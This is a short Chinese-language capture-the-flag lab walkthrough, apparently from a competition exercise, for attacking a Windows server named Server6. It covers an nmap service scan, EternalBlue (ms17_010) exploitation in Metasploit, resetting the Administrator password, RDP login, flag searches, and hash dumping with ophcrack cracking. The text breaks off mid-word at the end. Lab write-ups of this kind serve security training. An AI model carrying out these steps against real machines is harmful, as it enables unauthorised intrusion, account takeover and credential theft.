*任务说明:仅能获取Server6的IP地址
- 通过本地PC中渗透测试平台Kali对服务器场景Server6进行系统服务及版本扫描渗透测试,并将该操作显示结果中21端口对应的服务状态信息字符串作为Flag值提交;、 map -sV -sS 靶机ip
- 将首选DNS服务器地址作为Flag值提交;首先看靶机开放的端口
可以看到靶机开启了445端口
开启msfconsole找到永恒之蓝(ms17_010)漏洞模快
Search ms17_010
利用第二个
Use 2(使用)
Show options(查看配置参数)
设置被攻击机ip
Set rhosts 靶机ip
exploit进行攻击
攻击成功后进行shell连接(连接后会显示乱码,利用命令chcp 437 )
net user查看用户
net user Administrator 123456 为用户更改密码以便远程连接
设置完毕后退出,开启远程桌面命令
另外开启一个命令行远程连接 rdesktop ip -u 用户名 -p 密码
进入后cmd打开命令行 ipconfig /all
找到dns
3.找到Flag1作为Flag值提交;
dir find Flag1
4.找到Flag2作为Flag值提交;
同上
5.将系统最高权限管理员账户的密码作为Flag值提交。
hashdump获取当前用户密码哈希值
将得到的管理员的hash值,导入到ophcrack(彩虹表)进行破解
打开密码攻击打开ophcrack
点击Load 点击Single hash 粘贴哈希值
点击Tables 选择free small 点击install 选择root 找到自己的123文件点击OK
点击OK 后点击Crack进行破